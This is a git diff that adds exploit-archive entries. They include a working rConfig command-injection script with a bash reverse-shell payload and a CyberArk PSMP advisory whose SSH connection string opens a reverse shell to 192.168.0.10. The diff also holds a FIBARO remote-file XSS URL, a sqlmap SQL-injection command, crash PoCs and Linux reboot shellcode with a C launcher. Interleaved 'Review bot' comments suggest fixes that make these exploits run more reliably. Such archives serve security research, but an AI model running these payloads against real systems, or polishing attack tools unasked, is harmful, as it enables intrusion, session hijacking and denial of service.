diff --git a/exploits/ios/dos/48236.py b/exploits/ios/dos/48236.py new file mode 100755 index 000000000..f73e3d2dd --- /dev/null +++ b/exploits/ios/dos/48236.py @@ -0,0 +1,24 @@ +# Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC) +# Author: Ivan Marmolejo +# Date: 2020-03-22 +# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142 +# Software Link: App Store for iOS devices +# Tested Version: 5.0.25920 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: iPhone 6s iOS 13.3 + +Steps to Produce the Crash: +1.- Run python code: ProficySCADA.py +2.- Copy content to clipboard +3.- Open "ProficySCADA for iOS" +4.- Add +5.- Username --> admin +6.- Paste ClipBoard on "Password" +7.- Add +8.- Connect +9.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 257 +print (buffer) \ No newline at end of file diff --git a/exploits/multiple/remote/48239.txt b/exploits/multiple/remote/48239.txt new file mode 100644 index 000000000..29c56f87a --- /dev/null +++ b/exploits/multiple/remote/48239.txt 
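Review bot: The lines from `Steps to Produce the Crash:` through `9.- Crashed` in the new 48236.py are uncommented prose inside a Python module, so running the file as its own step 1 instructs fails with a SyntaxError before `buffer = "\x41" * 257` is reached; prefixing each of those ten lines with `# ` (or folding them into the header comment block) makes the file executable. The `#!/usr/bin/env python` line is placed after the header comments, where the loader does not read it; it should be line 1, and the same inert shebang placement appears in exploits/php/webapps/48241.py with `#!/usr/bin/python3`. `print (buffer)` is valid on both Python 2 and 3, so an unversioned `python` in the shebang is acceptable once it is on the first line.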
@@ -0,0 +1,93 @@ +# Exploit Title: CyberArk PSMP 10.9.1 - Policy Restriction Bypass +# Google Dork: NA +# Date: 2020-02-25 +# Exploit Author: LAHBAL Said +# Vendor Homepage: https://www.cyberark.com/ +# Software Link: https://www.cyberark.com/ +# Version: PSMP <=10.9.1 +# Tested on: PSMP 10.9 & PSMP 10.9.1 +# CVE : N/A +# Patched : PSMP >= 11.1 + +[Prerequisites] + +Policy allows us to overwrite PSMRemoteMachine + +[Description] +An issue was discovered in CyberArk Privileged Session Manager SSH Proxy +(PSMP) +through 10.9.1. +All recordings mechanisms (Keystoke, SSH Text Recorder and video) can be +evaded +because users entries are not properly validated. +Commands executed in a reverse shell are not monitored. +The connection process will freeze just after the "session is being +recorded" banner and the all commands we enter are not monitored. + +------------------------------------------ + +[Additional Information] +We can got a reverse shell (or execute any command we want) from remote +target and be completely invisible from CyberArk. In logs, we have only +both PSMConnect and PSMDisconnect events. +Here are details of the attack : +1. I connect through CyberArk PSMP server using this +connection string : ssh %username+address%'remoteMachine +bash -i >& /dev/tcp//&1'@ +Example : ssh slahbal%sharedLinuxAccount+test.intra%'linux01 bash -i >& +/dev/tcp/192.168.0.10/443 0>&1'@psmp +3. This connection string will : +- Connect me to linux01 using sharedLinuxAccount account that is stored +into CyberArk and to which I have access. +- Create a reverse shell to my workstation 192.168.0.10:443 (nc.exe is +listening on port 443 for this test). +4. The connection process will freeze just after "The sessions is being +recorded" banner +5. I got a reverse shell on which all commands ar not monitored. +Note 1 : The command that created the reverse shell is NOT captured by +CyberArk. 
+Note 2 : sshd_config has been set with those parameters : +PSMP_AdditionalDelimiter % +PSMP_TargetAddressPortAdditionalDelimiter + + +------------------------------------------ + +[VulnerabilityType Other] +Bypass all recordings mechanisms (Keystoke, SSH Text Recorder and video) + +------------------------------------------ + +[Vendor of Product] +CyberArk + +------------------------------------------ + +[Affected Product Code Base] +PSMP - <=10.9.1 + +------------------------------------------ + +[Affected Component] +/opt/CARKpsmp/bin/psmpserver + +------------------------------------------ + +[Attack Type] +Local + +------------------------------------------ + +[CVE Impact Other] +The vulnerability allow you to connect through CyberArk PSMP server +bypassing all recordings mechanisms + +------------------------------------------ + +[Attack Vectors] +To exploit the vulnerability, someone must connect through PSMP using a +crafted connection string. + +------------------------------------------ + +[Has vendor confirmed or acknowledged the vulnerability?] +true \ No newline at end of file diff --git a/exploits/multiple/webapps/48240.txt b/exploits/multiple/webapps/48240.txt new file mode 100644 index 000000000..80ad639d9 --- /dev/null +++ b/exploits/multiple/webapps/48240.txt 
@@ -0,0 +1,56 @@ +# Exploit Title: FIBARO System Home Center 5.021 - Remote File Include +# Date: 2020-03-22 +# Author: LiquidWorm +# Vendor: https://www.fibaro.com +# CVE: N/A + +Vendor: FIBAR GROUP S.A. +Product web page: https://www.fibaro.com +Affected version: Home Center 3, Home Center 2, Home Center Lite + 5.021.38 + 4.580 + 4.570 + 4.540 + 4.530 + 4.510 + 4.180 + + +Summary: Imagine that you live in a house where everything happens by itself. +FIBARO Smart Home takes care of your everyday comfort and safety of all family +members and in the meantime, saves energy on every single occasion. All this is +possible thanks to Home Center 2 smart home HUB. Home Center 2 is an indispensable +part of the FIBARO System without which the rest devices of home automation would +be only beautiful objects. The smart home HUB collects and analyzes information +about devices, communicates them with each other and thus directs the operation +of the entire system and takes care of its security. + +Desc: The smart home solution is vulnerable to a remote Cross-Site Scripting +triggered via a Remote File Inclusion issue by including arbitrary client-side +dynamic scripts (JavaScript, VBScript) due to the undocumented proxy API and its +url GET parameter. This allows hijacking the current session of the user or +changing the look of the page by changing the HTML. + +Tested on: Apache/2.2.16 (Debian) + nginx/1.9.5 + nginx/1.8.0 + lighttpd/1.4.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5563 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5563.php + + +04.02.2020 + +-- + + +http://10.0.0.2:8880/api/proxy?url=https://www.zeroscience.mk/pentest/XSS.svg + +$ cat /pentest/XSS.svg + \ No newline at end of file 
diff --git a/exploits/php/webapps/40968.php b/exploits/php/webapps/40968.sh old mode 100644 new mode 100755 similarity index 100% rename from exploits/php/webapps/40968.php rename to exploits/php/webapps/40968.sh diff --git a/exploits/php/webapps/48241.py b/exploits/php/webapps/48241.py new file mode 100755 index 000000000..2d0a3ce6b --- /dev/null +++ b/exploits/php/webapps/48241.py @@ -0,0 +1,54 @@ +# Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection +# Date: 2020-03-21 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.rconfig.com +# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip +# Version: rConfig 3.9.4 +# Tested on: Cent OS 7 (1908) + +#!/usr/bin/python3 + +import requests +import sys +import urllib.parse +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +if len(sys.argv) != 6: + print("[~] Usage : https://rconfig_host, Username, Password, Attacker IP, Attacker Port") + exit() + +host = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +attacker_ip = sys.argv[4] +attacker_port = sys.argv[5] + +login_url = host + "/lib/crud/userprocess.php" +payload = "|| bash -i >& /dev/tcp/{0}/{1} 0>&1 ;".format(attacker_ip, attacker_port) +encoded_payload = urllib.parse.quote_plus(payload) + + +def exploit(): + s = requests.Session() + + res = s.post( + login_url, + data={ + 'user': username, + 'pass': password, + 'sublogin': 1 + }, + verify=False, + allow_redirects=True + ) + + injection_url = "{0}/lib/crud/search.crud.php?searchTerm=test&catId=2&numLineStr=&nodeId={1}&catCommand=showcdpneigh*.txt&noLines=".format(host, encoded_payload) + res = s.get(injection_url, verify=False) + + if res.status_code != 200: + print("[~] Failed to connect") + + +if __name__ == '__main__': + exploit() \ No newline at end of file 
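Review bot: In `exploit()` the login response from `res = s.post(login_url, ...)` is never examined before `res` is rebound by `s.get(injection_url, ...)`, so an authentication failure is indistinguishable from success and the single diagnostic `print("[~] Failed to connect")` only ever describes the second request; a `res.status_code` check with an early `return` after the login would make that failure mode visible. The usage branch calls the bare builtin `exit()`, which is a `site`-module convenience rather than part of the language; `sys.exit(1)` is the portable form and `sys` is already imported. `from requests.packages.urllib3.exceptions import InsecureRequestWarning` goes through a compatibility alias; `from urllib3.exceptions import InsecureRequestWarning` is the supported import path.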
diff --git a/exploits/php/webapps/48242.txt b/exploits/php/webapps/48242.txt new file mode 100644 index 000000000..589b35000 --- /dev/null +++ b/exploits/php/webapps/48242.txt @@ -0,0 +1,36 @@ +# Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection +# Dork: inurl:"index.php?option=com_hdwplayer" +# Date: 2020-03-23 +# Exploit Author: qw3rTyTy +# Vendor Homepage: https://www.hdwplayer.com/ +# Software Link: https://www.hdwplayer.com/download/ +# Version: 4.2 +# Tested on: Debian/Nginx/Joomla! 3.9.11 + +########################################################################## +#Vulnerability details +########################################################################## +File: components/com_hdwplayer/models/search.php +Func: HdwplayerModelSearch::getsearch +Line: 33 + + 16 class HdwplayerModelSearch extends HdwplayerModel { + ...snip... + 30 function getsearch() { + 31 $db = JFactory::getDBO(); + 32 $search = JRequest::getVar('hdwplayersearch', '', 'post', 'string'); + 33 $query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')"; //!!! + 34 + 35 $db->setQuery($query); + 36 $output = $db->loadObjectList(); + 37 return($output); + 38 } + 39 + 40 } + 41 + 42 ?> + +########################################################################## +#PoC +########################################################################## +$> python ./sqlmap.py -u "http://127.0.0.1/joomla/index.php" --method=POST --random-agent --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" --level=5 --risk=3 --dbms=mysql -p hdwplayersearch \ No newline at end of file diff --git a/exploits/windows/dos/48237.txt b/exploits/windows/dos/48237.txt new file mode 100644 index 000000000..3a85250a3 --- /dev/null +++ b/exploits/windows/dos/48237.txt 
@@ -0,0 +1,82 @@ +# Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC) +# Google Dork: N/A +# Date: 2020-02-21 +# Exploit Author: Cem Onat Karagun of Diesec GmBH +# Vendor Homepage: https://www.google.com/ +# Version: Google Chrome 80.0.3987.87 +# Tested on: Windows x64 / Linux Debian x64 / MacOS +# CVE: CVE-2020-6404 +# PoC Video: http://www.youtube.com/watch?v=tv5sDDwiWg8 +# Description: https://bugs.chromium.org/p/chromium/issues/detail?id=1024256 + +Thread 35 "Chrome_InProcRe" received signal SIGSEGV, Segmentation fault. +[Switching to Thread 0x7f2cbf9ad700 (LWP 3275)] +[----------------------------------registers-----------------------------------] +RAX: 0x7f2cbe98d100 --> 0x41b58ab3 +RBX: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 +RCX: 0x1fffffffffffffff +RDX: 0x7f2cbeb8bdf4 --> 0x0 +RSI: 0x7f2cbeb8bdc0 --> 0x613000000000 --> 0xcc6e96b9 --> 0x0 +RDI: 0x0 +RBP: 0x7f2cbf9aaa70 --> 0x7f2cbf9aabf0 --> 0x7f2cbf9aad10 --> +0x7f2cbf9aadd0 --> 0x7f2cbf9aaea0 --> 0x7f2cbf9aafb0 (--> ...) 
+ +RSP: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 +RIP: 0x559e50c11189 (: mov cl,BYTE PTR +[rcx+0x7fff8000]) +R8 : 0xfffffffffffffff8 +R9 : 0x0 +R10: 0x7f2cbec6a670 --> 0x7f2cbec6a070 --> 0xd47000000000000 ('') +R11: 0x7f2cbe98d100 --> 0x41b58ab3 +R12: 0xfe597d31a20 --> 0x0 +R13: 0x7f2cbeb8bde8 --> 0x0 +R14: 0x0 +R15: 0x2 +EFLAGS: 0x10a06 (carry PARITY adjust zero sign trap INTERRUPT direction +OVERFLOW) +[-------------------------------------code-------------------------------------] +0x559e50c1117e : lea r8,[rdi-0x8] +0x559e50c11182 : mov rcx,r8 +0x559e50c11185 : shr rcx,0x3 +=> 0x559e50c11189 : mov cl,BYTE PTR +[rcx+0x7fff8000] +0x559e50c1118f : test cl,cl +0x559e50c11191 : +jne 0x559e50c11418 +0x559e50c11197 : add +rdi,0xffffffffffffffff +0x559e50c1119b : mov rcx,rdi +[------------------------------------stack-------------------------------------] +0000| 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0 +0008| 0x7f2cbf9aa9c8 --> 0xc0c001162e6 --> 0x0 +0016| 0x7f2cbf9aa9d0 --> 0xfe597d717be --> 0x0 +0024| 0x7f2cbf9aa9d8 --> 0xfe597d717bd --> 0x0 +0032| 0x7f2cbf9aa9e0 --> 0x7f2cbeb8bdf4 --> 0x0 +0040| 0x7f2cbf9aa9e8 --> 0x7f2cbeb8bea0 --> 0x6060008b1720 --> +0x602000098630 --> 0x200000003 --> 0x0 + +0048| 0x7f2cbf9aa9f0 --> 0x21bec4d308 --> 0x0 +0056| 0x7f2cbf9aa9f8 --> 0xfe597cfab48 --> 0x0 +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +Stopped reason: SIGSEGV +0x0000559e50c11189 in MappingForIndex () +at +../../third_party/blink/renderer/core/editing/finder/find_buffer.cc:450 +450 +../../third_party/blink/renderer/core/editing/finder/find_buffer.cc: No +such file or directory. + + + + + + + + + + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 19b8c416e..70f897f93 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -6686,6 +6686,8 @@ id,file,description,date,author,type,platform,port
 48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows,
 48137,exploits/windows/dos/48137.py,"Core FTP LE 2.2 - Denial of Service (PoC)",2020-02-26,"Ismael Nava",dos,windows,
 48216,exploits/windows/dos/48216.md,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)",2020-03-14,eerykitty,dos,windows,
+48236,exploits/ios/dos/48236.py,"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)",2020-03-23,"Ivan Marmolejo",dos,ios,
+48237,exploits/windows/dos/48237.txt,"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)",2020-03-23,"Cem Onat Karagun",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -18052,6 +18054,7 @@ id,file,description,date,author,type,platform,port
 48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple,
 48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware,
 48233,exploits/multiple/remote/48233.py,"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure",2020-03-18,"Maurizio S",remote,multiple,
+48239,exploits/multiple/remote/48239.txt,"CyberArk PSMP 10.9.1 - Policy Restriction Bypass",2020-03-23,"LAHBAL Said",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39294,7 +39297,7 @@ id,file,description,date,author,type,platform,port
 43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp,
 40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple,
 40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php,
-40968,exploits/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,
+40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,
 40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",webapps,php,
 40969,exploits/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",webapps,php,
 40971,exploits/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",webapps,php,
@@ -42486,3 +42489,6 @@ id,file,description,date,author,type,platform,port
 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
 48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
 48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php,
+48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple,
+48241,exploits/php/webapps/48241.py,"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection",2020-03-23,"Matthew Aberegg",webapps,php,
+48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index d1b7ca9e2..a0c0b9007 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1015,5 +1015,6 @@ id,file,description,date,author,type,platform
 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
 47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
 48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux
-48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
-48229,shellcodes/windows/48229.txt,"Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
+48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
+48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
+48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
diff --git a/shellcodes/linux/48243.txt b/shellcodes/linux/48243.txt
new file mode 100644
index 000000000..49fe06290
--- /dev/null
+++ b/shellcodes/linux/48243.txt
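Review bot: The new row `48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",...` keeps a backslash in `Linux\x86`, while the two rows rewritten in the same hunk change `Windows\x86` and `Windows\x64` to `Windows/x86` and `Windows/x64`; the added description should follow the normalisation it sits next to, `"Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)"`. The same `Linux\x86` spelling is in the `# Exploit Title:` line of shellcodes/linux/48243.txt, so both should be changed together to keep the index and the file title consistent.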
@@ -0,0 +1,55 @@ +# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes) +# Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot. +# Date: 2020-03-23 +# Author: Upayan a.k.a. slaeryan +# Contact: upayansaha@icloud.com +# SLAE: 1525 +# Vendor Homepage: None +# Software Link: None +# Tested on: Linux x86 +# CVE: N/A + + +/* +; Filename: reboot_polymorphic.nasm +; Author: Upayan a.k.a. slaeryan +; SLAE: 1525 +; Contact: upayansaha@icloud.com +; Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot. +; Testing: ./reboot_polymorphic +; Compile with: ./compile.sh reboot_polymorphic +; Size of shellcode: 26 bytes + +global _start + +section .text +_start: + xor eax, eax ; Clearing the EAX register + xor ebx, ebx ; Clearing the EBX register + xor ecx, ecx ; Clearing the ECX register + cdq ; Clearing the EDX register + mov al, 0x58 ; Loading syscall value = 0x58 for reboot in AL + mov ebx, 0xfee1dead ; Loading magic 1 in EBX + mov ecx, 672274793 ; Loading magic 2 in ECX + mov edx, 0x1234567 ; Loading cmd val = LINUX_REBOOT_CMD_RESTART in EDX + int 0x80 ; Executing the reboot syscall + +*/ + + +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80"; + +void main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file
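Review bot: The test harness in 48243.txt declares `void main()`, which is not a conforming signature for `main` in hosted C; `int main(void)` with a trailing `return 0;` is the portable form (the call through `ret()` is not expected to return, but the declaration still has to be valid for the compiler). `printf("Shellcode Length: %d\n", strlen(code))` passes a `size_t` to `%d`; the matching conversion is `%zu`. The two `#include` lines in this copy carry no header name after the directive, presumably `<stdio.h>` and `<string.h>` for `printf` and `strlen`; the committed file should be checked to confirm the names were not lost.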